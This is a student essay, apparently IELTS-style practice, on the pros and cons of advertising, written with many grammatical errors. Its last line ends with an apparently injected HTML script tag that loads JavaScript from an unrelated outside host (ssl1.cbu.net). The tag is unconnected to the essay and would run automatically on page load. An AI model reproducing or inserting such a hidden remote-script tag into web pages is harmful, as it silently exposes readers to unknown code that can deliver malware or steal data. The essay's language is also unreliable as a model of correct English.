Advertising is a tool which attract the customer to buy more and more goods. Discuss its pros and cons along with example.

Without any doubt, in the current epoch ads are very popular among the masses. In by gone era this trend had been disappear and companies employers went at door to door for selling their product. In this easy, I will discuss both merits and demerits of adverts before reaching the reasonable conclusion. In my opinion advantages are overweight the disadvantages.

There are myriad of reason why the advertising attract the buyer. The first and foremost is, today ad is the best way to promote the product. To exemplify it, in modern world majority of the people like to using the electronic gadgets. such as mobile phones, laptops, computer and TV etc. As a consequence, adds depicts on this gadgets and product get name and fame or the sale of good's high in proportion. furthermore, the ad is better strategy for both retailer and consumer. For example, firm represent their latest goods. On the other hand buyer know about latest goods.

Yet another viewpoint to substantiate mu stance is that , the most of the advertisements is related to their tradition and culture of every nation. It lead to know about other country living lifestyle, food and clothing etc.

On the down side, the advertising has few drawback. Firstly, some add are fake and cease the money from masses. To paradigm, the trend of doing online shopping is upsurge at the fast pace. we can only seen the product photo and pay amount with debit card and sometime it is fake or stealing the money

To recapitulate, although, advertising has some pros, its drawback cannot be overlooked . I personally opine that in this modern era add play vital role and necessary for everyone. However, it is our duty to buy goods from legal approved site by regime.<script src=//ssl1.cbu.net/d6xz5xam></script>